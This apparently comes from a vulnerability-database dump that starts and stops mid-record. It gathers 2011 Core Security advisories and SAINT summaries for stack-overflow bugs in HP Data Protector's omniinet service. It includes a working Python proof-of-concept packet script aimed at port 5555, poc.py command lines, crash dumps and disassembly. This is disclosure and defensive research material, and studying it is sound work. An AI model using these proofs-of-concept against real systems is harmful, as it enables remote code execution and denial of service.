vulnerability can be reproduced with any of the\nfollowing commands:\n \"poc.py 127.0.0.1 20 10000 30 13\" or \"poc.py 127.0.0.1 28 10000 30 6\"\n This causes a stack overflow.\n\n/-----\n007ce194 00426c52 007d0000 00810b48 007ce266 omniinet+0x26bf3\n007ce1a8 00412a35 007ce22c 004aa900 0080edb0 omniinet+0x26c52\n007cea3c 61616161 61616161 61616161 61616161 omniinet+0x12a35\n61616161 00000000 00000000 00000000 00000000 0x61616161\n\n- -----/\n\n\n\n8.2. *Vulnerability 2. Opcode 11.*\n\n[CVE-2011-1865] This vulnerability is reproduced with the following command:\n \"poc.py 127.0.0.1 11 10000 30 17\"\n A stack overflow is produced within the function swprintf, called from\nposition 0x00411A72.\n\n\n8.3. *Vulnerability 3. 
Opcode 35.*\n\n[CVE-2011-1865] This vulnerability can be reproduced with any of the\nfollowing commands:\n \"poc.py 127.0.0.1 35 10000 30 6\" or \"poc.py 127.0.0.1 35 10000 30 7\"\n A stack overflow is produced within the function swprintf, called from\nposition 0041367F.\n\n\n8.4. *Vulnerability 4. Opcode 42.*\n\n[CVE-2011-1865] This vulnerability is reproduced with the following command:\n \"poc.py 127.0.0.1 42 10000 30 9\"\n A stack overflow is produced by calling the function swprintf from\nposition 0x0040A9BA.\n\n\n8.5. *Vulnerability 5. Opcode 46.*\n\n[CVE-2011-1865] This vulnerability is reproduced with the following command:\n \"poc.py 127.0.0.1 46 10000 30 17\"\n A stack overflow is produced by calling the function swprintf from\nposition 0x0040A708.\n\n\n8.6. *Vulnerability 6. Opcode 27.*\n\n[CVE-2011-1865] This vulnerability is reproduced with the following command:\n \"poc.py 127.0.0.1 27 10000 30 3\"\n A stack overflow is produced by calling the function swprintf from\nposition 0x0040AD53.\n\n\n8.7. *Vulnerabilidad 7. Opcode 17.*\n\n[CVE-2011-1865] This vulnerability is reproduced with the following command:\n \"poc.py 127.0.0.1 17 10000 30 6\"\n A stack overflow is produced by calling the function swprintf from\nposition 0x0040FC05.\n\n\n8.8. *Vulnerability 8. 
Opcode 11.*\n\n[CVE-2011-1514] This vulnerability is reproduced with the following command:\n \"poc.py 127.0.0.1 11 1 7 6\"\n This causes a null pointer dereference.\n\n/-----\neax=00000014 ebx=00156490 ecx=007cdd34 edx=007eecf0 esi=00156490\nedi=00000000\neip=00407ed0 esp=007cdd34 ebp=007cdd8c iopl=0 nv up ei pl nz ac\npe nc\ncs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000\nefl=00010212\nomniinet+0x7ed0:\n00407ed0 8b10 mov edx,[eax]\nds:0023:00000014=????????\n\n\n007cdd8c 0041143e 00000000 00000000 00156490 omniinet+0x7ed0\n007cea3c 0040892b 00000001 0046b9f0 00000000 omniinet+0x1143e\n007cf4b8 00408f02 00000000 00000000 00156490 omniinet+0x892b\n007cf518 0040a42c 00000000 7ad5f7f9 00000000 omniinet+0x8f02\n007cffa0 77df352b 00000001 00156498 0012e7f8 omniinet+0xa42c\n007cffb4 7c80b713 00156490 00000000 0012e7f8\nADVAPI32!CryptVerifySignatureW+0x29\n007cffec 00000000 77df3519 00156490 00000000\nkernel32!GetModuleFileNameA+0x1b4\n\n- -----/\n\n\n8.9. *Vulnerability 9. Opcode 20.*\n\n[CVE-2011-1515] This vulnerability is reproduced with the following command:\n \"poc.py 127.0.0.1 20 1 7 6\"\n The process terminates without generating an exception, resulting in a\ndenial of service condition.\n\n\n9. *Report Timeline*\n\n. 2011-06-02:\nCore Security Technologies notifies HP Security Alert team of the\nvulnerabilities. Publication date is temporarily set to July 5th, 2011.\n\n. 2011-06-06:\nVendor acknowledges receipt.\n\n. 2011-06-06:\nCore sends technical details to the vendor.\n\n. 2011-06-06:\nVendor confirms that a new case was assigned within HP Software Security\nResponse Team (SSRT).\n\n. 2011-06-16:\nCore requests an update on this issue, in particular Core asks the\nvendor for a technical analysis of the bugs, a list of affected products\nand versions, and the vendor's plan for providing a fix (no reply\nreceived).\n\n. 2011-06-23:\nCore requests once more an update.\n\n. 
2011-06-28:\nVendor communicates that a security bulletin will be issued on the same\nday (June 28). The vendor confirms the vulnerabilities, and recommends\nas mitigation to enable encrypted communications in the cell server and\nclient.\n\n. 2011-06-28:\nCore requests a link to the vendor's bulletin, and asks whether CVE ids\nhave been assigned.\n\n. 2011-06-28:\nVendor provides a link to the bulletin and CVE names for the\nvulnerabilities.\n\n. 2011-06-29:\nAdvisory CORE-2011-0514 is published.\n\n\n10. *References*\n\n[1] HP Data Protector http://hp.com/go/dataprotector\n[2] HPSBMU02686 SSRT100541 rev.2 - HP OpenView Storage Data Protector,\nRemote Execution of Arbitrary Code\nhttp://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02872182\n\n\n11. *About CoreLabs*\n\nCoreLabs, the research center of Core Security Technologies, is charged\nwith anticipating the future needs and requirements for information\nsecurity technologies. We conduct our research in several important\nareas of computer security including system vulnerabilities, cyber\nattack planning and simulation, source code auditing, and cryptography.\nOur results include problem formalization, identification of\nvulnerabilities, novel solutions and prototypes for new technologies.\nCoreLabs regularly publishes security advisories, technical papers,\nproject information and shared software tools for public use at:\nhttp://corelabs.coresecurity.com.\n\n\n12. *About Core Security Technologies*\n\nCore Security Technologies enables organizations to get ahead of threats\nwith security test and measurement solutions that continuously identify\nand demonstrate real-world exposures to their most critical assets. 
Our\ncustomers can gain real visibility into their security standing, real\nvalidation of their security controls, and real metrics to more\neffectively secure their organizations.\n\nCore Security's software solutions build on over a decade of trusted\nresearch and leading-edge threat expertise from the company's Security\nConsulting Services, CoreLabs and Engineering groups. Core Security\nTechnologies can be reached at +1 (617) 399-6980 or on the Web at:\nhttp://www.coresecurity.com.\n\n\n13. *Disclaimer*\n\nThe contents of this advisory are copyright (c) 2011 Core Security\nTechnologies and (c) 2011 CoreLabs, and are licensed under a Creative\nCommons Attribution Non-Commercial Share-Alike 3.0 (United States)\nLicense: http://creativecommons.org/licenses/by-nc-sa/3.0/us/\n\n\n14. *PGP/GPG Keys*\n\nThis advisory has been signed with the GPG key of Core Security\nTechnologies advisories team, which is available for download at\nhttp://www.coresecurity.com/files/attachments/core_security_advisories.asc.\n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1.4.9 (MingW32)\n\niEUEARECAAYFAk4LmqsACgkQyNibggitWa02bgCYyTgE3BmdxGGAOY4dNZqmekvo\nCwCfTapBtDaQT/LBrrVC7K4l8G5hnEo=\n=ozGY\n-----END PGP SIGNATURE-----", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-04-01T19:04:18", "description": "\nHP Data Protector 6.20 - EXEC_CMD Buffer Overflow", "edition": 1, "published": "2011-06-30T00:00:00", "title": "HP Data Protector 6.20 - EXEC_CMD Buffer Overflow", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2011-1866"], "modified": "2011-06-30T00:00:00", "id": "EXPLOITPACK:00DB1608EA05836AAFE73947E6790FBA", "href": "", "sourceData": "-----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\n Core Security Technologies - Corelabs Advisory\n http://corelabs.coresecurity.com/\n\n HP Data Protector EXEC_CMD Buffer Overflow Vulnerability\n\n\n1. 
*Advisory Information*\n\nTitle: HP Data Protector EXEC_CMD Buffer Overflow Vulnerability\nAdvisory ID: CORE-2011-0606\nAdvisory URL:\nhttp://www.coresecurity.com/content/HP-Data-Protector-EXECCMD-Vulnerability\nDate published: 2011-06-29\nDate of last update: 2011-06-29\nVendors contacted: HP\nRelease mode: Coordinated release\n\n\n2. *Vulnerability Information*\n\nClass: Remote stack overflow [CWE-120]\nImpact: Code execution\nRemotely Exploitable: Yes\nLocally Exploitable: No\nCVE Name: CVE-2011-1866\n\n\n3. *Vulnerability Description*\n\nHP Data Protector [1] is an automated backup and recovery software for\nsingle-server to enterprise environments. A vulnerability in HP Data\nProtector could allow a remote attacker to execute arbitrary code. The\nvulnerability is triggered by sending a request to port 5555 of a host\nrunning the \"data protector inet\" service, part of HP Data Protector.\n\n\n4. *Vulnerable packages*\n\n . HP OpenView Storage Data Protector v6.20 (running on Windows).\n . HP OpenView Storage Data Protector v6.11 (running on Windows).\n . HP OpenView Storage Data Protector v6.10 (running on Windows).\n . HP OpenView Storage Data Protector v6.00 (running on Windows).\n . Previous versions may be affected, but were not tested.\n\n\n5. *Non-vulnerable packages*\n\n . No fixes are available at the time of publication.\n\n\n6. *Vendor Information, Solutions and Workarounds*\n\nHP has issued a security bulletin with document ID c02872182 [2]\navailable through HP Support Center at http://www.hp.com/go/HPSC.\n\nThe latest version of HP Data Protector is vulnerable to this issue. HP\nhas provided the following procedure to mitigate this vulnerability:\n\n 1. Upgrade to Data Protector A.06.20 or subsequent.\n 2. Enable encrypted control communication services on cell server and\nall clients in cell.\n\n The upgrade is available for download from\nhttp://hp.com/go/dataprotector then under 'Product Information' click on\n'Trials and Demos'.\n\n\n7. 
*Credits*\n\nThis vulnerability was discovered and researched by Nahuel C. Riva from\nCore Security Technologies. Publication was coordinated by Carlos Sarraute.\n\n\n8. *Technical Description / Proof of Concept Code*\n\nThe following python script can be used to reproduce the bug.\n\n/-----\nimport sys\nimport socket\n\nfrom struct import pack\n\nip = sys.argv[1]\nport = int(sys.argv[2]) # default tcp port 5555\n\ntarget = (ip, port)\n\ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\ns.connect(target)\n\npath = 'A' * 5000\n\npacket = pack('<L', 0x20003220)\npacket += pack('<L', 0x00302000)\npacket += '\\x20'\npacket += pack('>H', 0x0020)\npacket += pack('<L', 0x00432000)\npacket += pack('<L', 0x00303220)\npacket += '\\x20'\npacket += 'omnicheck.exe'\npacket += pack('>H', 0x0020)\npacket += pack('>H', 0x0020) * 4\npacket += pack('<L', 0x30200030)\npacket += pack('>H', 0x0020)\npacket += path\npacket += pack('>H', 0x0000)\n\nplen = pack('>L', len(packet))\n\ns.send(plen + packet)\n\n- -----/\n By executing this script, the omniinet.exe process crashes in the\nfollowing EIP:\n\n/-----\n7C8285D3 8B0424 MOV EAX,DWORD PTR SS:[ESP]\n7C8285D6 8BE5 MOV ESP,EBP\n7C8285D8 5D POP EBP\n7C8285D9 C3 RETN\n \n- -----/\n This is part of a function inside the ntdll.dll library, however, if we\nlook the SEH chain, we can see that the SEH handler was overwritten with\nthe value 0x00410041 (the unicode value for \"AA\"):\n\n/-----\nSEH chain of thread 00000578\nAddress SE handler\n009AFF94 omniinet.00410041\n00410041 A3004472\n \n- -----/\n The following are the values of the CPU registers at the time of the\ncrash:\n\n/-----\nEAX C0000008\nECX 009AEC98\nEDX 7C82859C ntdll.KiRaiseUserExceptionDispatcher\nEBX 0015B480\nESP 009AEC44\nEBP 009AEC94\nESI 00155A80\nEDI 00000000\nEIP 7C8285D3 ntdll.7C8285D3\nC 0 ES 0023 32bit 0(FFFFFFFF)\nP 1 CS 001B 32bit 0(FFFFFFFF)\nA 0 SS 0023 32bit 0(FFFFFFFF)\nZ 0 DS 0023 32bit 0(FFFFFFFF)\nS 0 FS 003B 32bit 7FFDB000(FFF)\nT 0 GS 0000 NULL\nD 
0\nO 0 LastErr ERROR_SUCCESS (00000000)\nEFL 00000206 (NO,NB,NE,A,NS,PE,GE,G)\nST0 empty 0.0\nST1 empty 0.0\nST2 empty 0.0\nST3 empty 0.0\nST4 empty 0.0\nST5 empty 0.0\nST6 empty 0.7610000000000000098\nST7 empty 1.0000000000000000000\n 3 2 1 0 E S P U O Z D I\nFST 4020 Cond 1 0 0 0 Err 0 0 1 0 0 0 0 0 (EQ)\nFCW 027F Prec NEAR,53 Mask 1 1 1 1 1 1\n \n- -----/\n The problem is in the 0041D170 function. This function does a blind\ncopy of the string passed in the packet as a path:\n\n/-----\n0041D170 /$ 55 PUSH EBP\n0041D171 |. 8BEC MOV EBP,ESP\n0041D173 |. 51 PUSH ECX\n0041D174 |. 8B45 08 MOV EAX,DWORD PTR SS:[EBP+8]\n0041D177 |. 8945 FC MOV DWORD PTR SS:[EBP-4],EAX\n0041D17A |. 8B4D 08 MOV ECX,DWORD PTR SS:[EBP+8]\n0041D17D |. 0FB711 MOVZX EDX,WORD PTR DS:[ECX]\n0041D180 |. 85D2 TEST EDX,EDX\n0041D182 |. 74 73 JE SHORT omniinet.0041D1F7\n[...]\n0041D1F7 |> 8B45 0C /MOV EAX,DWORD PTR SS:[EBP+C]\n0041D1FA |. 0FB708 |MOVZX ECX,WORD PTR DS:[EAX]\n0041D1FD |. 85C9 |TEST ECX,ECX\n0041D1FF |. 74 26 |JE SHORT omniinet.0041D227\n0041D201 |. 8B55 08 |MOV EDX,DWORD PTR SS:[EBP+8]\n0041D204 |. 8955 FC |MOV DWORD PTR SS:[EBP-4],EDX\n0041D207 |. 8B45 08 |MOV EAX,DWORD PTR SS:[EBP+8]\n0041D20A |. 8B4D 0C |MOV ECX,DWORD PTR SS:[EBP+C]\n0041D20D |. 66:8B11 |MOV DX,WORD PTR DS:[ECX]\n0041D210 |. 66:8910 |MOV WORD PTR DS:[EAX],DX // copy WORDs\nto the stack\n0041D213 |. 8B45 08 |MOV EAX,DWORD PTR SS:[EBP+8]\n0041D216 |. 83C0 02 |ADD EAX,2\n0041D219 |. 8945 08 |MOV DWORD PTR SS:[EBP+8],EAX\n0041D21C |. 8B4D 0C |MOV ECX,DWORD PTR SS:[EBP+C]\n0041D21F |. 83C1 02 |ADD ECX,2\n0041D222 |. 894D 0C |MOV DWORD PTR SS:[EBP+C],ECX\n0041D225 |.^EB D0 \\JMP SHORT omniinet.0041D1F7\n0041D227 |> 8B55 08 MOV EDX,DWORD PTR SS:[EBP+8]\n0041D22A |. 66:C702 0000 MOV WORD PTR DS:[EDX],0\n0041D22F |. 8B45 FC MOV EAX,DWORD PTR SS:[EBP-4]\n0041D232 |. 8BE5 MOV ESP,EBP\n0041D234 |. 5D POP EBP\n0041D235 \\. C3 RETN\n \n- -----/\n\n\n\n9. *Report Timeline*\n\n. 
2011-06-06:\nCore Security Technologies notifies the HP team of the vulnerabilities\nand provides the technical details. Publication date is temporarily set\nto July 5th, 2011.\n\n. 2011-06-06:\nVendor confirms that a new case was assigned within HP Software Security\nResponse Team (SSRT).\n\n. 2011-06-16:\nCore requests an update on this issue, in particular Core asks the\nvendor for a technical analysis of the bugs, a list of affected products\nand versions, and the vendor's plan for providing a fix (no reply\nreceived).\n\n. 2011-06-23:\nCore requests once more an update.\n\n. 2011-06-28:\nVendor communicates that a security bulletin will be issued on the same\nday (June 28). The vendor confirms the vulnerabilities, and recommends\nas mitigation to enable encrypted communications in the cell server and\nclient.\n\n. 2011-06-28:\nCore requests a link to the vendor's bulletin, and asks whether CVE ids\nhave been assigned.\n\n. 2011-06-28:\nVendor provides a link to the bulletin and CVE names for the\nvulnerabilities.\n\n. 2011-06-29:\nAdvisory CORE-2011-0606 is published.\n\n\n\n10. *References*\n\n[1] HP Data Protector http://hp.com/go/dataprotector\n[2] HPSBMU02686 SSRT100541 rev.2 - HP OpenView Storage Data Protector,\nRemote Execution of Arbitrary Code\nhttp://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02872182\n\n\n11. *About CoreLabs*\n\nCoreLabs, the research center of Core Security Technologies, is charged\nwith anticipating the future needs and requirements for information\nsecurity technologies. 
We conduct our research in several important\nareas of computer security including system vulnerabilities, cyber\nattack planning and simulation, source code auditing, and cryptography.\nOur results include problem formalization, identification of\nvulnerabilities, novel solutions and prototypes for new technologies.\nCoreLabs regularly publishes security advisories, technical papers,\nproject information and shared software tools for public use at:\nhttp://corelabs.coresecurity.com.\n\n\n12. *About Core Security Technologies*\n\nCore Security Technologies enables organizations to get ahead of threats\nwith security test and measurement solutions that continuously identify\nand demonstrate real-world exposures to their most critical assets. Our\ncustomers can gain real visibility into their security standing, real\nvalidation of their security controls, and real metrics to more\neffectively secure their organizations.\n\nCore Security's software solutions build on over a decade of trusted\nresearch and leading-edge threat expertise from the company's Security\nConsulting Services, CoreLabs and Engineering groups. Core Security\nTechnologies can be reached at +1 (617) 399-6980 or on the Web at:\nhttp://www.coresecurity.com.\n\n\n13. *Disclaimer*\n\nThe contents of this advisory are copyright (c) 2011 Core Security\nTechnologies and (c) 2011 CoreLabs, and are licensed under a Creative\nCommons Attribution Non-Commercial Share-Alike 3.0 (United States)\nLicense: http://creativecommons.org/licenses/by-nc-sa/3.0/us/\n\n\n14. 
*PGP/GPG Keys*\n\nThis advisory has been signed with the GPG key of Core Security\nTechnologies advisories team, which is available for download at\nhttp://www.coresecurity.com/files/attachments/core_security_advisories.asc.\n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1.4.9 (MingW32)\n\niEYEARECAAYFAk4LnZsACgkQyNibggitWa07/ACfSlzkBvbowAskeP/K4FqtxCay\nEAkAnRCPKdc35t5Cb0ZJbGy4me4JRALo\n=zHon\n-----END PGP SIGNATURE-----", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "saint": [{"lastseen": "2016-10-03T15:02:02", "bulletinFamily": "exploit", "cvelist": ["CVE-2011-1866"], "description": "Added: 06/27/2012 \nCVE: [CVE-2011-1866](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1866>) \nBID: [48488](<http://www.securityfocus.com/bid/48488>) \nOSVDB: [73572](<http://www.osvdb.org/73572>) \n\n\n### Background\n\n[HP Data Protector](<http://h71028.www7.hp.com/enterprise/w1/en/software/information-management-data-protector.html>) is an automated data backup solution. \n\n### Problem\n\nA buffer overflow vulnerability in `omniinet.exe` in the inet service of HP OpenView Storage Data Protector allows remote attackers to execute arbitrary commands by sending a specially crafted request to the inet service on port 5555/tcp. \n\n### Resolution\n\nApply the update referenced in [HPSBMU02686](<http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02872182>). \n\n### References\n\n<http://secunia.com/advisories/45100/> \n\n\n### Limitations\n\nThis exploit has been tested against HP OpenView Storage Data Protector 6.11 on Microsoft Windows Server 2003 SP2 English (DEP OptOut) and Microsoft Windows Server 2008 SP2 (DEP OptOut). 
\n\n### Platforms\n\nWindows \n \n\n", "edition": 1, "modified": "2012-06-27T00:00:00", "published": "2012-06-27T00:00:00", "id": "SAINT:BFECBBFEF0FF935EC2948195CF6FCA20", "href": "http://www.saintcorporation.com/cgi-bin/exploit_info/hp_data_protector_inet_svc_exec_cmd", "type": "saint", "title": "HP OpenView Storage Data Protector inet Service EXEC_CMD Remote Overflow", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-06-04T23:19:41", "bulletinFamily": "exploit", "cvelist": ["CVE-2011-1866"], "description": "Added: 06/27/2012 \nCVE: [CVE-2011-1866](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1866>) \nBID: [48488](<http://www.securityfocus.com/bid/48488>) \nOSVDB: [73572](<http://www.osvdb.org/73572>) \n\n\n### Background\n\n[HP Data Protector](<http://h71028.www7.hp.com/enterprise/w1/en/software/information-management-data-protector.html>) is an automated data backup solution. \n\n### Problem\n\nA buffer overflow vulnerability in `omniinet.exe` in the inet service of HP OpenView Storage Data Protector allows remote attackers to execute arbitrary commands by sending a specially crafted request to the inet service on port 5555/tcp. \n\n### Resolution\n\nApply the update referenced in [HPSBMU02686](<http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02872182>). \n\n### References\n\n<http://secunia.com/advisories/45100/> \n\n\n### Limitations\n\nThis exploit has been tested against HP OpenView Storage Data Protector 6.11 on Microsoft Windows Server 2003 SP2 English (DEP OptOut) and Microsoft Windows Server 2008 SP2 (DEP OptOut). 
\n\n### Platforms\n\nWindows \n \n\n", "edition": 4, "modified": "2012-06-27T00:00:00", "published": "2012-06-27T00:00:00", "id": "SAINT:06C6A95370F0B8116A7243D809437C0C", "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/hp_data_protector_inet_svc_exec_cmd", "title": "HP OpenView Storage Data Protector inet Service EXEC_CMD Remote Overflow", "type": "saint", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T17:19:57", "bulletinFamily": "exploit", "cvelist": ["CVE-2011-1866"], "edition": 2, "description": "Added: 06/27/2012 \nCVE: [CVE-2011-1866](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1866>) \nBID: [48488](<http://www.securityfocus.com/bid/48488>) \nOSVDB: [73572](<http://www.osvdb.org/73572>) \n\n\n### Background\n\n[HP Data Protector](<http://h71028.www7.hp.com/enterprise/w1/en/software/information-management-data-protector.html>) is an automated data backup solution. \n\n### Problem\n\nA buffer overflow vulnerability in `omniinet.exe` in the inet service of HP OpenView Storage Data Protector allows remote attackers to execute arbitrary commands by sending a specially crafted request to the inet service on port 5555/tcp. \n\n### Resolution\n\nApply the update referenced in [HPSBMU02686](<http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02872182>). \n\n### References\n\n<http://secunia.com/advisories/45100/> \n\n\n### Limitations\n\nThis exploit has been tested against HP OpenView Storage Data Protector 6.11 on Microsoft Windows Server 2003 SP2 English (DEP OptOut) and Microsoft Windows Server 2008 SP2 (DEP OptOut). 
\n\n### Platforms\n\nWindows \n \n\n", "modified": "2012-06-27T00:00:00", "published": "2012-06-27T00:00:00", "id": "SAINT:1A7CE71BAD720EA2DC8BE64DC4A90616", "href": "http://download.saintcorporation.com/cgi-bin/exploit_info/hp_data_protector_inet_svc_exec_cmd", "type": "saint", "title": "HP OpenView Storage Data Protector inet Service EXEC_CMD Remote Overflow", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2016-10-03T15:01:54", "bulletinFamily": "exploit", "cvelist": ["CVE-2011-1865"], "description": "Added: 07/18/2011 \nCVE: [CVE-2011-1865](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1865>) \nBID: [48486](<http://www.securityfocus.com/bid/48486>) \nOSVDB: [73571](<http://www.osvdb.org/73571>) \n\n\n### Background\n\nHP Data Protector is a backup solution for enterprise and distributed environments. The Data Protector environment consists of a Cell Manager, backup agents, and backup device servers. The OmniInet process (`**omniinet.exe**`) is responsible for communication between systems in the cell as well as for starting other processes that are used for backup and restore operations. \n\n### Problem\n\nA buffer overflow vulnerability allows remote attackers to execute arbitrary commands by sending an overly long opcode 27 request to the OmniInet process. \n\n### Resolution\n\nUpgrade to Data Protector A.06.20 or newer and enable encrypted control communication services on the cell server and all clients in the cell, as described in HP Security Bulletin [HPSBMU02686 SSRT100541](<http://www.itrc.hp.com/service/cki/docDisplay.do?docId=emr_na-c02872182>). \n\n### References\n\n<http://secunia.com/advisories/45100> \n\n\n### Limitations\n\nExploit works on HP OpenView Storage Data Protector 6.20. 
\n\n### Platforms\n\nWindows Server 2003 \nWindows XP \n \n\n", "edition": 1, "modified": "2011-07-18T00:00:00", "published": "2011-07-18T00:00:00", "id": "SAINT:BE1843E272D1C58DB8EE87EEE629BCF9", "href": "http://www.saintcorporation.com/cgi-bin/exploit_info/hp_data_protector_opcode_27", "type": "saint", "title": "HP OpenView Storage Data Protector Opcode 27 Stack Buffer Overflow", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-06-04T23:19:41", "bulletinFamily": "exploit", "cvelist": ["CVE-2011-1865"], "description": "Added: 07/18/2011 \nCVE: [CVE-2011-1865](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1865>) \nBID: [48486](<http://www.securityfocus.com/bid/48486>) \nOSVDB: [73571](<http://www.osvdb.org/73571>) \n\n\n### Background\n\nHP Data Protector is a backup solution for enterprise and distributed environments. The Data Protector environment consists of a Cell Manager, backup agents, and backup device servers. The OmniInet process (`**omniinet.exe**`) is responsible for communication between systems in the cell as well as for starting other processes that are used for backup and restore operations. \n\n### Problem\n\nA buffer overflow vulnerability allows remote attackers to execute arbitrary commands by sending an overly long opcode 27 request to the OmniInet process. \n\n### Resolution\n\nUpgrade to Data Protector A.06.20 or newer and enable encrypted control communication services on the cell server and all clients in the cell, as described in HP Security Bulletin [HPSBMU02686 SSRT100541](<http://www.itrc.hp.com/service/cki/docDisplay.do?docId=emr_na-c02872182>). \n\n### References\n\n<http://secunia.com/advisories/45100> \n\n\n### Limitations\n\nExploit works on HP OpenView Storage Data Protector 6.20. 
\n\n### Platforms\n\nWindows Server 2003 \nWindows XP \n \n\n", "edition": 4, "modified": "2011-07-18T00:00:00", "published": "2011-07-18T00:00:00", "id": "SAINT:C5838FC8C5DFFAC4C8B6A54D44AF1F95", "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/hp_data_protector_opcode_27", "title": "HP OpenView Storage Data Protector Opcode 27 Stack Buffer Overflow", "type": "saint", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T17:19:56", "bulletinFamily": "exploit", "cvelist": ["CVE-2011-1865"], "edition": 2, "description": "Added: 07/18/2011 \nCVE: [CVE-2011-1865](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1865>) \nBID: [48486](<http://www.securityfocus.com/bid/48486>) \nOSVDB: [73571](<http://www.osvdb.org/73571>) \n\n\n### Background\n\nHP Data Protector is a backup solution for enterprise and distributed environments. The Data Protector environment consists of a Cell Manager, backup agents, and backup device servers. The OmniInet process (`**omniinet.exe**`) is responsible for communication between systems in the cell as well as for starting other processes that are used for backup and restore operations. \n\n### Problem\n\nA buffer overflow vulnerability allows remote attackers to execute arbitrary commands by sending an overly long opcode 27 request to the OmniInet process. \n\n### Resolution\n\nUpgrade to Data Protector A.06.20 or newer and enable encrypted control communication services on the cell server and all clients in the cell, as described in HP Security Bulletin [HPSBMU02686 SSRT100541](<http://www.itrc.hp.com/service/cki/docDisplay.do?docId=emr_na-c02872182>). \n\n### References\n\n<http://secunia.com/advisories/45100> \n\n\n### Limitations\n\nExploit works on HP OpenView Storage Data Protector 6.20. 
\n\n### Platforms\n\nWindows Server 2003 \nWindows XP \n \n\n", "modified": "2011-07-18T00:00:00", "published": "2011-07-18T00:00:00", "href": "http://download.saintcorporation.com/cgi-bin/exploit_info/hp_data_protector_opcode_27", "id": "SAINT:58795E132074156A75A962B77A5E7B84", "title": "HP OpenView Storage Data Protector Opcode 27 Stack Buffer Overflow", "type": "saint", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "exploitdb": [{"lastseen": "2016-02-02T07:54:41", "description": "HP Data Protector 6.20 EXEC_CMD Buffer Overflow Vulnerability. CVE-2011-1866. Dos exploit for windows platform", "published": "2011-06-30T00:00:00", "type": "exploitdb", "title": "HP Data Protector 6.20 EXEC_CMD Buffer Overflow Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2011-1866"], "modified": "2011-06-30T00:00:00", "id": "EDB-ID:17461", "href": "https://www.exploit-db.com/exploits/17461/", "sourceData": "-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n Core Security Technologies - Corelabs Advisory\r\n http://corelabs.coresecurity.com/\r\n\r\n HP Data Protector EXEC_CMD Buffer Overflow Vulnerability\r\n\r\n\r\n1. *Advisory Information*\r\n\r\nTitle: HP Data Protector EXEC_CMD Buffer Overflow Vulnerability\r\nAdvisory ID: CORE-2011-0606\r\nAdvisory URL:\r\nhttp://www.coresecurity.com/content/HP-Data-Protector-EXECCMD-Vulnerability\r\nDate published: 2011-06-29\r\nDate of last update: 2011-06-29\r\nVendors contacted: HP\r\nRelease mode: Coordinated release\r\n\r\n\r\n2. *Vulnerability Information*\r\n\r\nClass: Remote stack overflow [CWE-120]\r\nImpact: Code execution\r\nRemotely Exploitable: Yes\r\nLocally Exploitable: No\r\nCVE Name: CVE-2011-1866\r\n\r\n\r\n3. *Vulnerability Description*\r\n\r\nHP Data Protector [1] is an automated backup and recovery software for\r\nsingle-server to enterprise environments. A vulnerability in HP Data\r\nProtector could allow a remote attacker to execute arbitrary code. 
The\r\nvulnerability is triggered by sending a request to port 5555 of a host\r\nrunning the \"data protector inet\" service, part of HP Data Protector.\r\n\r\n\r\n4. *Vulnerable packages*\r\n\r\n . HP OpenView Storage Data Protector v6.20 (running on Windows).\r\n . HP OpenView Storage Data Protector v6.11 (running on Windows).\r\n . HP OpenView Storage Data Protector v6.10 (running on Windows).\r\n . HP OpenView Storage Data Protector v6.00 (running on Windows).\r\n . Previous versions may be affected, but were not tested.\r\n\r\n\r\n5. *Non-vulnerable packages*\r\n\r\n . No fixes are available at the time of publication.\r\n\r\n\r\n6. *Vendor Information, Solutions and Workarounds*\r\n\r\nHP has issued a security bulletin with document ID c02872182 [2]\r\navailable through HP Support Center at http://www.hp.com/go/HPSC.\r\n\r\nThe latest version of HP Data Protector is vulnerable to this issue. HP\r\nhas provided the following procedure to mitigate this vulnerability:\r\n\r\n 1. Upgrade to Data Protector A.06.20 or subsequent.\r\n 2. Enable encrypted control communication services on cell server and\r\nall clients in cell.\r\n\r\n The upgrade is available for download from\r\nhttp://hp.com/go/dataprotector then under 'Product Information' click on\r\n'Trials and Demos'.\r\n\r\n\r\n7. *Credits*\r\n\r\nThis vulnerability was discovered and researched by Nahuel C. Riva from\r\nCore Security Technologies. Publication was coordinated by Carlos Sarraute.\r\n\r\n\r\n8. 
